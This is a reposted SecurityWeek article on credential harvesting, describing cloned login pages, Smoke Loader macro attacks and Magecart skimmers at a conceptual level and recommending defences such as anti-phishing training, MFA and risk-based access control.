[BreachExchange] The Foundation of Cyber-Attacks: Credential Harvesting

[Destry Winant]

https://www.securityweek.com/foundation-cyber-attacks-credential-harvesting

Recent reports of a newly detected Smoke Loader infection campaign and
the re-emergence of Magecart-based cyber-attacks illustrate a common
tactic used by cyber criminals and state-sponsored attackers alike ―
credential harvesting. According to the Verizon 2017 Data Breach
Investigation Report, 81% of hacking-related breaches leverage either
stolen, default, or weak credentials. While credential harvesting is
often seen as equivalent to phishing, it uses different tactics.

Cyber attackers long ago figured out that the easiest way for them to
gain access to sensitive data is by compromising an end user’s
identity and credentials. Betting on the human factor and attacking
the weakest link in the cyber defense chain, credential harvesting has
become the foundation of most cyber-attacks.

While credential harvesting is widely used by attackers – what they do
with the stolen information can vary greatly. In some cases, the
credentials will be used for subsequent attacks where the goal is to
gain access to systems or network resources, or they can be monetized
by taking over bank accounts or simply selling the information on the
Darknet.

Both consumers and business users need to understand that credential
harvesting comes in multiple flavors and combinations and is not
always solely tied to email phishing. In general, cyber adversaries
leverage either social engineering techniques, malware, digital
scammers, or any combination thereof to steal credentials. Most users
are familiar with phishing emails that contain links to cloned
websites, or  weaponized attachments that install malware on the
victim’s computer.

In the case of cloned websites, the victim is often unaware of the
attack, since the fake web designs are often very authentic. When the
user enters his or her credentials, the page not only captures them
but  then forwards them to the actual login page, which then logs in
the user. The victim never even knows their credentials were stolen.
In other cases, like the recent Smoke Loader infection campaign, the
attack begins with phishing emails that carry a weaponized Word
document. When a user opens the file, it triggers the execution of a
macro that downloads malware to subsequently harvest the user’s
credentials.

The latest technique being used for credential harvesting are digital
skimmers. While skimming was originally applied to ATM machines,
threat groups like Magecart have perfected its use for the digital
world. By injecting scripts into commonly used Web tools such as cloud
analytics plug-ins, content management systems, and online support
snippets, cyber criminals can steal data that is entered into online
payment forms or login pages on eCommerce sites.

One such attack targeted a global online ticket sales company,
andsales company and made headlines just a few weeks ago. According to
the security researchers that detected the attack, more than 800 other
websites were impacted by Magecart campaigns. Magecart actors continue
to evolve their approach and are now compromising third-party tools
rather than injecting JavaScript into individual websites. In doing
so, they’re now able to harvest exponentially more credentials than in
the past.

Risk Mitigation

So what steps can consumers and businesses take to minimize the risk
of falling victim to these credential harvesting campaigns? Here are a
few fundamental steps to take:

● Anti-Phishing Training: Educating users ― be it consumers or
corporate ― about the risk of phishing and the characteristics of
these attacks is an essential first step.

● Limit Use of Third-Party Web Scripts / Plug-Ins: Exercise caution
when deploying third-party Web tools. Investigate the security
protocols used by these tools to determine if they’re comprehensive
enough to minimize malware injections. Obviously, restricting the use
of third-party Web tools must balance security with providing a
differentiated customer experience.

● Multi-Factor Authentication (MFA): Since MFA requires multiple
methods for identification (something you know, something you have,
and something you are), it’s one of the best ways to prevent
unauthorized users from accessing sensitive data and moving laterally
within the network. Thus, it should be standard practice for all
organizations.

● Risk-Based Access Control: Risk-based access uses machine learning
to define and enforce access policy, based on user behavior. Through a
combination of analytics, machine learning, user profiles, and policy
enforcement, access decisions can be made in real time, to ease
low-risk access, step up authentication when risk is higher, or block
access entirely. Risk-based access control is often used in
combination with MFA.

Stealing a valid credential and using it to access a network is
easier, less risky, and ultimately more efficient than using an
existing vulnerability, even a zero-day. Cyber security defenses need
to adapt to this fact. User education and beefing up an organization’s
authentication systems are two essential steps that can minimize the
risks associated with credential harvesting and subsequent
cyber-attacks aimed at data exfiltration.